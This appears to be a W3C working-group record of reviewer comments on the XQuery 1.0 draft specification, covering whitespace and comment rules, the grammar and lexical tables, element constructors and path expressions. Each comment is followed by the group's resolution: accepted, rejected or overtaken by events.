In the definition of the function 'type-matches', phrases like: type-matches(ET, AT) returns true if: 1. AT is a known type, and is the same as ET, or is derived by one or more steps of restriction or extension from ET, or 2. AT is an unknown type, and an implementation-dependent mechanism is able to determine that AT is derived by restriction from ET. might be better stated as "validly derived from ET according to the XML Schema specification rules" instead of "derived by one or more steps of restriction or extension from ET".
I recommend rejection of this comment. The referenced text has been debated extensively. We intend to emphasize the difference between derivation by restriction and by extension.

4. Section 3.7.1.5 Type of a Constructed Element
Bullet point 2, for the case of "strict" validation. The search for a type definition is described as "the in-scope element declarations are searched for an element declaration whose unique name matches the name of the constructed element." This description is not complete: it should also mention that the presence of "xsi:type" in the constructed element can also be used, and further, that "xsi:type" will take precedence over in-scope element declarations.
Overtaken by events. The referenced text no longer exists. We no longer have validation.

3. Section 3.7.3.2 Computed Attribute Constructors
The last paragraph in this section says, "the computed attribute constructor must not be a namespace declaration attribute--that is, its name must not be xmlns or a QName with prefix xmlns." In the Namespace 1.1 Recommendation at [2], the following definition appears in. ] Note that the term prefix is not used. Suggested text: --that is, the QName must not be xmlns and must not begin xmlns:. (N.B. in the rec both "xmlns" and "xmlns:" appear in bold). [2]
Overtaken by events. The referenced text no longer exists. The constraint is described in terms of a URI rather than a namespace prefix.

1. Section 2 Basics
Section 2, third paragraph, says, "some kinds of nodes have typed values, string values, and names, which can be extracted from the node". Although technically this is correct, it would be better to refer to section 2.4.2, where it explains that all (not just some) have typed values and string values, though not all allow access to the values. It can be made more precise by saying something like: "All nodes have typed values and string values, some of which can be extracted from the node. Some kinds of nodes also have names, which can be extracted from the node. For details on how these values are determined and on their availability for various node types please see section 2.4.2."
Mostly done. Fixed text to denote that all nodes have typed value and string value. This is an introductory section, not a place for detail.

XQuery: editorial. Section 2.1 as written can lead to misunderstandings. I think we should reword it a little bit by making clear the following two points, and correcting an error. (a) The information in the static context of an expression is also used for the evaluation phase.
(error: as consequence of this, first paragraph in 2.1.1 should mention that this information can also decide if the expression has a dynamic error) (b) Each subexpression of an expression can have a different static and dynamic context during the entire lifetime of that expression: parsing, static analysis and evaluation. Best regards, Dana Requests a statement that static context is used also during the evaluation phase. Status: Recommend to reject, because this is already made clear by paragraph 3 of Section 2.1.2, Dynamic Context. SECTION A.2.2: lexical rules Second para, second sentence: "Each table corresponds to a lexical state and shows that the tokens listed are recognized when in that state." It would help to state that any unlisted tokens are lexical errors. For the reader who misses this sentence entirely, it might help if each table had a last row whose "Pattern" is "any other token" and whose "Transition to state" was "lexical error". - Steve B. We looked at Scott's modified text. SECTION 2.1.1: Static context The definition of "default collation" is followed immediately by the sentence "for exceptions to this rule...". To me, a definition should be something that has no exceptions. One way to fix this would be to move the exceptions into the definition. Thus, "Default collation. This collation is used ... except as specified in 4.11 Default Collation Declaration." - Steve B. Status: Overtaken by events. Referenced sentence no longer exists. SECTION 3.7.1.4: whitespace in element content It would also be useful to show examples with xml:space attributes. The last example looks like a good starting point. <a>{" "}</a> creates <a> </a> even if xmlspace is strip. Thus with "declare xmlspace strip", <a xml: </a> creates <a xml:{" "}</a> creates <a xml: </a> in spite of the xml:space='default' attribute. The xml:space attribute is advice to the application that ultimately consumes the element, whereas xmlspace is a directive (stronger than advice) to the XQuery engine constructing the element. The user must use both in order to get any particular desired result. - Steve B. Status: Recommend to reject. We have decided that xml:space is treated as an ordinary attribute that does not affect the content of the constructed node. The document states this rule. I do not think that we need examples to illustrate this lack of effect. SECTION A.2.1: white space rules Whereas: a) the whitespace rules for XQuery are so complex (What is "ignorable whitespace"? How will the user learn that he can put a comment between a $ and a QName, but not between "for" and "$"? What is the difference between "whitespace: explicit" and "whitespace: significant"? Do the XQuery whitespace rules govern EBNF's that are quoted from other documents that don't have XQuery conventions?) b) there are different whitespace rules for so many different cases (in direct element constructors not nested within an enclosed expression; in other kinds of direct constructors; in comments, pragmas, and must-understand extensions; in keyword phrases that are necessary for disambiguation; in all other contexts -- I think I got them all, but I am not sure). My suggestion is that you give up on implicit whitespace rules in the EBNF, and go with totally explicit whitespace in every EBNF. You already have S to represent spaces, tabs and newlines. To that you can add other symbols. For example IWS might stand for what you call "ignorable whitespace". I think IWS ::= S | Pragma | MUExtension | ExprComment. 
Now given S and IWS, you can clearly write ForClause ::= "for" S? "$" IWS? Varname IWS? TypeDeclaration? ... etc., which clearly shows that a comment is not allowed between "for" and "$". You can also clear up the nesting possibilities of comments, pragmas and must-understand extensions. E.g., is it Pragma ::= "(::" S? "pragma" S? QName S? ... or is it Pragma ::= "(::" IWS? "pragma" IWS? QName IWS? ... - Steve B. Proposal accepted. See. SECTION 2.6.2: static typing feature Second sentence: "However, non-type-related static errors must be detected and raised during the static analysis phase." It is unclear whether this applies only to implementations that support the static typing feature, or to all implementations. I think you mean the latter (if not, this sentence belongs within the Definition). In that case, it would read better as: "All XQuery implementations must detect and raise non-type-related static errors during the static analysis phase." - Steve B. [unclear when all implementations must raise non-type-related static errors] Status: Overtaken by events. Section has been rewritten and the referenced sentence no longer exists. SECTION 2.6.2: static typing feature First sentence: "[Definition: An XQuery implementation that does not support the Static Typing Feature is not required to raise type errors during the static analysis phase.]" This would read better if stated positively: "An XQuery implementation that supports the Static Typing Feature is required to raise type errors during the static analysis phase." - Steve B. Status: Accepted and implemented. SECTION A.1.1: grammar notes grammar-note: xml-version It says "The general rules for [XML 1.1] vs. [XML 1.0], as described in A.2 Lexical structure, should be applied...". The word "vs." is confusing. When I first read this, I thought you meant "The general rules for [XML 1.1], and not the general rules for [XML 1.0], should be applied...". However, consulting section A.2, I think what you mean is "It is implementation-defined whether the general rules for [XML 1.0] or [XML 1.1] are applied, as described in section A.2...". - Steve B. Status: Accepted and implemented. SECTION A.2.1: white space rules It would be helpful to state in Rule "ws: explicit" that comments, pragmas and must-know extensions are not whitespace, as the term is understood for any rule marked with this annotation. The only thing that is meant by whitespace for the sake of this rule is S, which does not include comments, pragmas or must-know extensions. - Steve B. We looked at Scott's modified text. Don: What about "1(: hello :)2"? Treat it as 12 in element constructor? Scott: yes, in element constructor, not in other contexts such as let Accepted. We looked at Scott's modified text. SECTION 3.7.3.1: computed element constructor The sentence after rule [100] says "The name expression of a computed element expression is processed as follows...". Just looking at this section, it seems that the term "name expression" is not defined. Actually, it is defined, in section 3.7.3 "Computed constructors". Providing a hot link to the definition of name expression would be useful. Likewise for content expression later in this section, and similarly for the other kinds of computed constructors. - Steve B. Status: Accepted and implemented. SECTION A.1: EBNF First para, last sentence: "This appendix should be regarded as normative...". I think it is better to avoid the word "should". Just say "This appendix is normative...". - Steve B. 
See [435] RESOLUTION: adopted ACTION A-SJ04-29 Don to change "should be regarded as" to "is" [[accepted]] SECTION 3.7.1.4: whitespace in element content This section uses the phrase "element content", which is a term defined in XML 1.0 section 3.2.1 "element content" as "[Definition: An element type has element content when elements of that type must contain only child elements (no character data), optionally separated by white space (characters matching the nonterminal S.]". The XQuery working draft, on the other hand, has no definition for "element content", either explicitly or by reference to XML 1.0. It seems in the present section that your use of "element content" is not the same as the definition in XML 1.0. For one thing, XML 1.0 uses the phrase "element content" only with reference to validated XML, whereas you use it only with reference to the result of a direct element constructor, which is unvalidated. I think you mean "the content of an element" whereas XML 1.0 means "content which consists solely of elements and whitespace". I grant that your use of "element content" is probably closer to ordinary English usage than XML 1.0's, but having two conflicting meanings for the same phrase in these two specifications will be very confusing. There will be dialogs in which one person means the XML 1.0 meaning and the other person means the XQuery meaning, and the two people will have to go through a lot of discussion before they realize they are not using the words to mean the same thing. There will be people who misunderstand the XQuery specification because of prior familiarity with XML 1.0, and vice versa. Since XML 1.0 is already a recommendation, I suggest you find some other phrase, such as "content of an element", and avoid "element content". - Steve B. Requests that we stop using the common English term "element content" because its meaning has been pre-empted by XML 1.0. Status: Accepted and implemented. SECTION 3.7.1.2: namespace declaration attributes It would be better if the example showed both ways to get a namespace declared for an element constructor, using both the prolog and a namespace declaration attribute, like this: declare namespace <height> <metric:meters>3</metric:meters> </height> <width> <english:feet>6</english:feet> </width> <depth> <english:inches>18</english:inches> </depth> </box> - Steve B. Suggests that an example, intended to illustrate namespace declaration attributes, also illustrate prolog namespace declarations at the same time. Status: Recommend to reject. This example illustrates the intended feature. Other features are described and illustrated elsewhere. SECTION 3.7.1.1: Attributes Second para, last setence: "All the attribute nodes ... must have distinct names". More precisely, they must have distinct expanded QNames, as explained in section 5.3 of "Namespaces in XML" or section 6.3 of "Namespaces in XML 1.1". - Steve B. Status: Accepted and implemented. SECTION 3.1.6: Comments This section appears to be misplaced, since it says that "Comments may be used anywhere ignorable whitespace is allowed." I assume this means they can be used in the prolog as well as in expressions. In that case, this section is broader in scope than just expressions, so it does not belong as a subsection of section 3 "Expressions" or (worse) 3.1 "Primary Expressions". On the other hand, direct element constructors are part of the expression syntax, yet ExprComments are not allowed in them. 
Thus the connection between ExprComments and expressions is a non-connection in both directions: you can have comments outside expressions, and sometimes you can't have comments within expressions. - Steve B. Don will change the status quo to make the explanation better. Some discussion of whether or not PW's proposal addresses this issue. ScB: This issue is where do we discuss comments in the document? DC: I'm abstaining on how comments should be treated in the grammar, but I am in sympathy with this comment. Right now comments are documented as a sub-category of primary expression. Really they're broader than that. I'm willing to do that. JR: There are productions for comments and they're part of the grammar. PC: This item is clearly only about where comments are described. Accepted: Don will change the status quo to make the explanation better. SECTION 3: Expressions Third para: "a query may consist..." The term "query" is not defined. Perhaps this sentence is (part of) the definition. But in that case "may" seems like the wrong word. The definition of "query" might be something like "[Definition: a query consists of one or more modules.]" - Steve B. Requests a definition of the term "query". Status: Accepted and implemented. SECTION. Requests a better definition for must-understand extensions. Status: Overtaken by events. Must-understand extensions no longer exist. SECTION 2.6.5: pragmas Rule [1] "Pragma" is followed by a C-style comment /* gn:parens */. I think this is the first rule in the specification with such a comment. What does this mean? I expected to find a section near the beginning of the specification, possibly called "Conventions" or the like, to explain your metalanguage. I see that XML 1.0 did something similar with their VC and WFC notes, which was never explained as a convention either, but at least they put the specification of the validity constraint or well-formedness constraint shortly after the occurrence of the VC or WFC note. In your case, it turns out that you have placed all the /* gn: ... */ in one place, in Appendix A.1.1. "Grammar notes". Similarly the /* ws:... */ comments are collected in Appendix A.2.1 "White space rules". It would help the reader to have a conventions section near the beginning to explain this convention. Perhaps your reply is that you already have hot links on these things. That is fine for people reading the document on the web, but not everyone wants to read the spec in a browser. The problem with browsers is that it is difficult to flip back and forth between sections, which is fairly easily done in hardcopy with sticky notes, or just a finger or pen stuck between pages. Hot links do not justify never explaining your conventions. - Steve B. excerpt: Andrew: could these comments be filtered out altogether and be put in the summary instead? Jonathan: everything must be completely specified and be as clear as possible. I'd rather give the editors a chance to play with this than give a specific solution. Scott: I tend to like Andrew's idea, as it unclutters the exposition a little bit. Don: I'm pretty neutral on this Proposals: (1) amend the text up front to explain what the comments are (2) put the comments only in the section that's already prefaced with a comment that explains them. ACTION on Don and Scott to choose and implement one of these. Proposals: (1) amend the text up front to explain what the comments are (2) put the comments only in the section that's already prefaced with a comment that explains them. 
ACTION A-SJ04-28 on Don and Scott to choose and implement one of these. [[accepted]] SECTION 2.4.4.3 : Matching an ElementTest and an Element Node List item 2)b) says "...if the given element node has the nilled property...". This condition is always true; every element node has a nilled property (though the value of the nilled property may be false). What is meant is "...if the nilled property of the element node is true...". - Steve B. Requests change in semantics of nilled property in element tests. Status: Overtaken by events. This section has been rewritten. SECTION 2.2.5 : Consistency constraints second para, definition: "...For a given node in the data model..." But the data model is an abstraction, and it is not particular to the run-time environment in which an expression is evaluated. A node, on the other hand, is a data value, found in the run-time environment. Thus "in" can not mean any kind of physical or logical containment in the phrase "node in the data model". What you probably mean is "node, as defined by the Data Model specification." But there is no need to qualify every occurrence of "node" with such a phrase, because the only data that XQuery considers is data that conforms to the Data Model specification. Thus this sentence reduces to just "for a given node". - Steve B. Requests deletion of certain occurrences of this phrase. Status: Accepted and implemented. SECTION no specific location Words and phrases appear in bold throughout the document. There is no description of the convention being followed. It appears to be that a bolded word or phrase has a formal definition somewhere. There does not appear to be a consistent convention about whether a bolded phrase is appearing in its own definition, or the definition is merely being referenced. For example, most of the bolded words in section 2 "Basics" appear within the [Definition:...] convention, which is fairly self-explanatory (although widely misused for things that are not really definitions at all, but that is the subject of other comments). On the other hand, in section 3.7.3 "Computed constructors", the phrases "name expression" and "content expression" are bolded, and their definitions are here, though not enclosed in the [Definition: ...] convention. These same phrases appear in other passages in bold, where they are to be understood as references back to the definition. The point is that there is no consistency about how to tell whether a use of bolding indicates a definition, or a reference to a definition. By way of contrast, a common convention is that a term is italicized when it is being defined, and not italicized when it is being referenced. - Steve B. Observes that some bold terms appear in definitions and some do not. Status: This is true and I have a work item to invest more effort in adding termdefs and termrefs to the document, but I do not consider this to be high-priority work. I do not think this work is a prerequisite to entering Last Call. SECTION no specific locaton: none Many of the things called definitions are not. A definition should tell a reader how to recongize something when he comes across it, or how to find or construct a thing. Consider this definition from 2.4.4.4 "Matching an AttributeTest..." "[Definition: An AttributeTest is used to match an attribute node by its name and/or type.]" This is like saying "[Definition: a bulldozer is used to move dirt.]" A true fact, but I still don't know a bulldozer when I see one, nor how to build a bulldozer. 
If all I had was this definition, I might think a shovel or a dump truck was a bulldozer. Coming back to the definition I cited, the actual definition of AttributeTest is found in rule [130]. Perhaps the things defined by EBNF need no [Definition:...]. Eliminating definitions of things defined in the EBNF would be a start, but there are many other improper definitions. Consider setion 2.6.6 "Must-understand extensions", first para: "[Definition: An implementation may extend XQuery functionality by supporting must-understand extensions. A must-understand extension may be used anywhere that ignorable whitespace is allowed.]" This is not a definition, it is discussion of the properties of a must-understand extension. - Steve B. Gives two examples of non-helpful definitions and claims there are many more. Status: The two examples cited have been eliminated. If further changes are required, please submit specific change proposals. Appendices Editorial Some appendices seem to be explicitly marked as non-normative. Some that are not marked should be marked so as well: E.g. the precedence table, the glossary etc. Partially done. Normative vs. non-normative must be specified at the level of a whole appendix, and all the normative appendices must come before any non-normative ones. I made the error-code appendix normative and the glossary non-normative, and moved the error-code appendix before the glossary appendix. Appendix A.1 EBNF Editorial Is there a reason why "$" is outside of the production of VarName? We can still use something like <"for" VarName> to indicate the necessary token lookahead and define VarName as "$" QName. RESOLUTION: closed, rejected. See [450] RESOLUTION: closed, rejected [[rejected]] Section 4.12 Function Declaration Editorial Non-normative [120]: Why is it (")" | (")" "as" SequenceType)) and not ")" ( "as" SequenceType)? See [432], excerpt: Because the long token has to transit to lexical state ITEMTYPE. Can he live with it? RESOLUTION: qt-2004Feb0797-01 closed with no action Microsoft can live with not making the change. RESOLUTION: qt-2004Feb0797-01 closed with no action Microsoft can live with not making the change. [[rejected]] Section 4.10 xmlspace declaration Editorial/Technical "The xmlspace declaration in a Prolog controls whether boundary whitespace is preserved by element and attribute constructors during execution of the query" -> "The xmlspace declaration in a Prolog controls whether boundary whitespace is preserved by element and attribute constructors during parsing of the query" Also: renaming this property to boundary space or xquery whitespace is acceptable (see Oracle comment). Partially done. Changed "execution of query" to "processing of query". Whitespace preservation does not apply only to parsing, but to the semantics of element construction. Details are found in "Content" subsection of Direct Element Constructors. Section 4.8 Variable Declaration Editorial "All variable names declared in a library module must be explicitly qualified by the namespace prefix of the module's target namespace.[err:XQ0048] ": It should be the namespace URI and not prefix that drives this. Section 4.6 Schema Import Editorial The Note on static typing and DTD is a bit unmotivated. Why do we need to say this here? We have not mentioned DTDs before. Please either remove or make the context more relevant. 
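A hedged sketch related to the Section 4.8 Variable Declaration comment above (module name and namespace URI are invented; the prolog syntax follows the draft as quoted elsewhere in these minutes): the declared variable is qualified with the prefix bound to the module's target namespace, and the comment's point is that the constraint should be keyed on that namespace URI, not on the particular prefix spelling.

    (: hypothetical library module with target namespace "http://example.com/geo" :)
    module namespace geo = "http://example.com/geo";

    (: "geo" is only a prefix; what identifies the variable is the expanded
       name {http://example.com/geo}pi, which is the URI-based check the
       comment asks for :)
    declare variable $geo:pi { 3.141592653589793 };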
Section 4.5 Default Namespace Declaration Editorial "The effect of declaring a default function namespace is that all functions in the default function namespace, including implicitly-declared constructor functions, are aliased with a name that has the original local name, but no namespace URI. ": This is a weird way of explaining that the syntactic name resolver will add the namespace URI given as the default if no prefix is specified. Please reword this sentence. I recommend rejection of this comment. It suggests rewording a sentence that was debated for a long time. Since this was a contentious issue it should be changed only by consensus of the working group. Section 4.5 Default Namespace Declaration Editorial "The string literal used in a default namespace declaration must be a valid URI [err:XQ0046], and may be a zero-length string.[err:XQ0046] ": Remove double reference to error. Also see comment MS-XQ-LC1-127 Section 4.4 Namespace Declaration Editorial Please change "The output of the above query is as follows. <foo:bing> Lentils </foo:bing>" to "The output of the above query is as follows. <foo:bing xmlns: Lentils </foo:bing>" Section 4.3 Base URI Declaration Editorial/Technical Please rewrite "A static error [err:XQ0046] is raised if the string literal in a base URI declaration does not contain a valid URI." to "A static error [err:XQ0046] should be raised if the string literal in a base URI declaration does not contain a valid URI." Note that we do not require URI format checks in other contexts either. I recommend rejection of this comment. It suggest changing "an error is raised" to "an error should be raised". The error and its triggering condition remain the same. I see no motivation for making this change. Section 4.2 Module Declaration Editorial "The names of all variables and functions declared in a library module must be explicitly qualified by the target namespace prefix.[err:XQ0048]": When is the error called? What happens with variables and functions inside a library module that does not have the same namespace? Also, please do require the targetnamespace URI and not the prefix to be the same. SECTION 2.2.1 : Prefix Bindings fn: is bound to It should be as defined in the XQuery 1.0 language spec. In general, it is better to refer these common prefix bindings to XQuery 1.0 language spec. - Steve B. Status: Overtaken by events. Each new version of the specification updates these URIs with new dates. SECTION 3.2.1: Steps It says in section 3.2, "This sequence of steps is then evaluated from left to right. Each operation E1/E2 is evaluated as follows: Expression E1 is evaluated, and if the result is not a sequence of nodes, a type error is raised." So query "/a/(1 to 5)[2]" should raise a type error because (1 to 5) does not return a sequence of nodes. However, it also says in section 3.2.1, "A filter step consists simply of a primary expression followed by zero or more predicates. ... This result may contain nodes, atomic values, or any combination of these." This should be clarified, e.g. by saying "a filter step must return a set of nodes when used in a path expression." - Steve B. Overtaken by events. Filter steps are now called filter expressions and are described separately from path expressions. SECTION 3.1.2: Variable References Consider the following query: for $j in (1,2) let $i:= $i +1 return <foo>{$i}</foo> This raises a dynamic error because the $i on the right is not bound yet. 
This is based on 3.8 Flwor expression rule on variable scope: "The scope does not include the expression to which the variable is bound". However, this is counter-intutive for users who are used to procedural programming and now work on XQuery which is a functional language. It would be better to list this as an example to explain why the variable reference of $i on the right results in dynamic errors. - Steve B. I recommend rejection of this comment. It suggests inserting an example into Section 3.1.2 that requires understanding of FLWOR and constructor expressions, which have not been introduced yet. This example would be helpful in a tutorial, but it is not necessary in a specification. SECTION 2: Basics There is a list of predefined namespace prefixes stated in Basics. It should add xml = as well, which is consistent with 4.4 - Steve B. SECTION 3.7.1.5: Type of a constructed element In 3.7.1.5, the spec states how the type of a constructed element is assigned via automatic schema validation process. The conceptual description here is more or less repeated from 3.13 validate expression. It would be better if the spec made a cross reference to 3.13 here. If there are any inconsistencies between the two, then 3.13 validate Expression should be considered normative. - Steve B. Overtaken by events. Automatic validation is gone. SECTION 3.8.3: Order by and Return Clauses In 3.8.3, it has a rule stated as: "Each orderspec must return values of the same type for all tuples in the tuple stream". Later, the orderspec considers the special values in the orderspec, such as empty sequence. Then, empty sequence should be considered the same type as for all other tuples in the tuple stream. Suggested rewording: "For each position in the tuple, there must exist an atomic type for which the gt operator is defined, such that the value of the orderspec in that position is either the empty sequence or can be promoted to that atomic type". Consider a tuple stream of 2 tuples, the first tuple is empty sequence and the second tuple is an atomic value with type "xs:string" and typed value is "cat". From the spec, it is not clear if this tuple stream is legal for order unless we state that empty sequence is considered the same type as 'xs:string' in this case. - Steve B. SECTION 3.12.2: Typeswitch In 2.5.3 Errors and Optimizations: "To avoid unexpected errors caused by reordering of expressions, tests that are designed to prevent dynamic errors should be expressed using conditional or typeswitch expressions. Conditional and typeswitch expressions raise only dynamic errors that occur in the branch that is actually selected." And in 3.10 Conditional Expressions: "Conditional expressions have a special rule for propagating dynamic errors...." However, for 3.12.2 typeswitch, there is no similar paragraph to state that typeswitch expressions have a special rule for propagating dynamic errors, that is, only the the branch that is actually selected can raise dynamic errors. - Steve B. SECTION 3.9 : Unordered Expressions Unordered Expressions, as defined in 3.9, returns a sequence of items in a nondeterministic order. Consider the following XQuery example defined in 3.2.2 Predicates by applying the additional fn:unordered() function: (fn:unordered(21 to 29))[5] Since fn:unordered() returns a sequence in a nondeterminstic order, it should be clarified that the result can be any integer value between 21 and 29. The behavior needs to be specified in 3.9 and 3.2.2. - Steve B. 
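A small sketch of the point raised in the comment above (illustrative only; the unordered{} form is the syntactic shorthand referred to in the disposition that follows, assuming that proposal's syntax):

    (: with an ordered sequence the positional predicate selects one item :)
    (21 to 29)[5]                    (: 25 :)

    (: once the sequence is made unordered, the predicate may select any of
       the nine integers; the result is nondeterministic :)
    (fn:unordered(21 to 29))[5]      (: any value from 21 to 29 :)

    (: the shorthand discussed in the disposition below :)
    (unordered { 21 to 29 })[5]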
This comment from a participant (Steve Buxton, Oracle) asks for clarification about the non-determinance of application of fn:unordered() to certain expressions containing a predicate that is a numeric value. This comment is addressed in intent by the "unordered" proposal's specification of non-deterministic results when the "unordered{}" syntax is used. Because that usage is a syntactic shorthand for uses of fn:unordered(), the clear implication is that those uses of fn:unordered() also return non-deterministic results. Subject to proper application of the "unordered" proposal's specifications, this comment is resolved. I consider this comment to be resolved by the "unordered" proposal. SECTION A.2.2: lexical rules OCCURRENCEINDICATOR state table, first row: There is no description of what input_stream.backup(1) means. This should go in the explanatory material at the beginning of this section. - Steve B. See [437] RESOLUTION: accepted, Scott to add explanation [[accepted]] SECTION A.2.2: lexical rules OCCURRENCEINDICATOR state table, first row: There is no pattern called NotOccurrenceIndicator. Probably what is meant is 'anything except "?", "*" or "+"'. A better way to handle this would be to make this the last row of the table rather than the first, and change the Pattern column to something like "(anything other than "?", "*" or "+")". - Steve B. See [440] RESOLUTION: accepted as per item 29 above [[accepted]] SECTION A.2.2: lexical rules The rules in the tables do not appear to allow comments, pragmas and must-know extensions as ignorable whitespace in the middle of certain sequences of tokens. For example, in the DEFAULT state table, first row, last list item, <"declare" "validation">, or more importantly, fourth row, items <"for" "$">, <"let" "$">, <"some" "$">, <"every" "$">. I believe the intention is to permit comments, pragmas and must-know extensions in the midst of these token sequences. Note that there is no recognition of just the first token in these sequences ("declare", "for", "let", "some", "every") so that for example for (: set up loop :) $i in fn:doc("...") is unrecognizable by these tables, and presumably a lexical error. Glancing at the tables, it seems that whenever you enclose a sequence of patterns in angle brackets <...>, that it is not permitted to have a comment. This seems far too limiting. How will users ever learn where they can insert comments? - Steve B. Keep the status quo, but clarify that comments are allowed everywhere that implicit space is. Waiting detailed proposal. ScB: Requesting approval for the intent. A proposal is needed for the details. MK: Jerome seemed to be the lone voice of opposition on this change. ScB: I'll give Jerome a call. ScB: Nothing points to the comment productions (from elsewhere in the grammar). ScB: I don't want to put it explicitly in the BNF, but we need more exposition. DC: These new words will go in the grammar part of the document and don't require any changes to the earlier sections. ScB: I'll start with the grammar appendix and we can review it to see if the change needs to go elsewhere. Accepted: We'll keep the status quo. Waiting detailed proposal. [Liam note: the minutes mention that this issue is closed in several places despite the words "Waiting detailed proposal"] SECTION A.2.1: white space rules It is hard to understand the distinction between /* ws:explicit */ and /* ws:significant */. 
For example, rule [106] CDataSection and rule [108] XmlComment have been labeled /* ws:significant */, whereas rule [107] XmlPI is labeled /* ws:explicit */. I don't see any difference between these three things from the standpoint of the XML 1.0 Recommendation. What distinction are you trying to make here? - Steve B. SECTION A.2.1: white space rules The definition of /* ws:significant */ says it means "that whitespace is significant as value content". But "Value content" is not defined. Does it mean "the value of the non-terminal on the left hand side of the indicated EBNF rule"? - Steve B. SECTION A.2 : lexical structure The first sentence characterizes the legal characters of XML 1.1 as forming a "larger set" than those of XML 1.0. Actually, it is the other way around: Char in XML 1.1 is a subset of Char in XML 1.0 (a lot of characters called "discouraged" in the XML 1.0 Errata have been removed in XML 1.1). What you may be thinking of in this sentence is that Name in XML 1.1 is a superset of Name in XML 1.0. This is true, but it is not exactly relevant, since XQuery never references Name. Instead, the basic component of your identifiers is NCName, which is defined in either "Namespaces in XML" (i.e., XML 1.0) or "Namespaces in XML 1.1". Unfortunately, D.2 "Normative references" does not reference the latter. In summary, what I think you want for the first sentence is "It is implementation defined whether the lexical rules of [XML 1.0] and [XML Names] are followed, or alternatively, the lexical rules of [XML 1.1] and [XML Names 1.1] are followed." (using [XML Names 1.1] as the normative reference to "Namespaces in XML 1.1"). There are other possible resolutions. One would be that implementations have two choices: 1. whether Char is XML 1.0 or XML 1.1, and 2. whether NCName is playing by 1.0 or 1.1 rules. Another resolution would be that implementations can choose either the most restrictive for both (ie, Char from XML 1.1 and NCName from 1.0) or the most inclusive for both (ie, Char from XML 1.0 and NCName from XML 1.1). - Steve B. See [462] RESOLUTION: Adopted, Scott will remove the incorrect statement RESOLUTION: Adopted, Scott will remove the incorrect statement SECTION A.1.1: grammar notes grammar-note:parens says "a look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." You need to look ahead more than one character in order to distinguish Pragma, MUExtension and ExprComment. - Steve B. See [117]. Yes, needs to be fixed. Waiting complete proposal from scott. SECTION A.1.1: grammar notes grammar-note:parens says "a look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." Look-ahead is also required to distinguish between a function pattern and a keyword, for example "for (: whom the bell :) $tolls =" is the beginning of a ForClause. That's using my notion of what "ignorable whitespace" ought to be, not what it evidently is according to A.2 Lexical rules. - Steve B. See [116]. Yes, needs to be fixed. Waiting complete proposal from scott. SECTION A.1: EBNF Some of the non-terminals duplicate definitions found in XML 1.0, namely rule [106] CDataSection is the same as rule [18] CDSect in XML 1.0; rule [107] XmlPI is the same as rule [16] PI in XML 1.0, and rule [108] XmlComment is the same as rule [15] Comment in XML 1.0. Actually, the rules are stated better in XML 1.0, since that document is careful to exclude the terminating symbols where your rules just have Char*. 
It would be better to just cite the XML 1.0 definitions. - Steve B. Proposal fails, we keep the status quo. ScB: I think it's a great idea to reference XML for those productions. I think we can work around any parsing obscurities. Proposal: make the change. MK: I feel uneasy, but I don't know why. DC: They make our document less self-contained. JR: Can we compromise by copying it directly? MK: Then we have the problem of which is normative. ScB: Personally, I'd rather just point to the XML spec. Proposal: make the change. Preference poll: 7=no change, 3=change, 5=abstain Proposal fails, we keep the status quo. SECTION 3.2: path expressions Seventh para (excluding rules [69] and [70]), last sentence says "In general it is best to use parentheses when "/" is used as the first operand of an operator, e.g., (/) * 5." And in "grammar-note: leading-lone-slash" in A.1.1 we find: "The "/" presents an issue because it occurs both in a leading position and an operator position in expressions. Thus, expressions such as "/ * 5" can easily be confused with the path expression "/*". Therefore, a stand-alone slash, in a leading position, that is followed by an operator, will need to be parenthesized in order to stand alone, as in "(/) * 5". "5 * /", on the other hand, is fine. " It will help to augment the example like this: "4 + / * 5" is a parse error, because the slash, although it appears following the + operator, is still the first operand of the * operator. On the other hand, "4 * / + 5" is not a parse error, because it is equivalent to "(4 * /) + 5", meaning that the slash is not the first operand of an operator. In "4*/*5", is the "/" a "leading slash" ? Is "/div 2" legal ? We recommend using "Should, Must or May" in place of e.g. "will need to be". - Steve B. See [439]. RESOLUTION: Don: use MUST as per comment. Add the 4 + / * 5 with blanks but not the (incorrect) 4 * / + 5 example. The way to avoid the parse error is to put ( ) around the leading slash to make (/). Scott noted that the suggested examples in the comment may be incorrect: 4 * / + 5 is also a parse error. RESOLUTION: Don: use MUST as per comment. Add the 4 + / * 5 with blanks but not the (incorrect) 4 * / + 5 example. The way to avoid the parse error is to put ( ) around the leading slash to make (/). [[accepted]] SECTION 3.2 : path expressions Seventh para (excluding rules [69] and [70]) says "For instance, "/*" is an expression with a wildcard, and "/*5" is a parse error". It would help to mention that use of whitespace will not alter this analysis: "/ *" is an expression with a wildcard, but "/ * 5" is a parse error. - Steve B. See [438]. RESOLUTION: Don to add white space as described RESOLUTION: Don to add white space as described [[accepted]] SECTION 3.1.6: XQuery comments Rule [4] ExprCommentContent refers to /* gn: parens */. The text of that grammar note does not appear to be relevant to rule [4], since the grammar note only talks about distinguishing a function from a comment. Perhaps what is meant is that, when processing the interior of a comment, if you encounter "(", you need to look ahead one more character to see if the "(" is part of ExprCommentContent or the beginning of a new ExprComment. If so, grammar note gn:parens needs to be enhanced to discuss this issue. - Steve B. Proposal accepted. Overtaken by events. The referenced grammar note no longer exists. 
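A few hedged examples restating the leading-slash resolution above (they mirror the cases quoted in the comment and Scott's correction; not additional normative cases):

    (/) * 5       (: parenthesized leading slash used as an operand: fine :)
    5 * /         (: slash not in a leading position: fine, per the grammar note :)
    / * 5         (: parse error; easily confused with the path expression "/*" :)
    4 + / * 5     (: parse error; the slash is still the first operand of "*" :)
    4 * / + 5     (: also a parse error, per Scott's correction above :)
    /div 2        (: the comment asks whether this is legal; left open here :)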
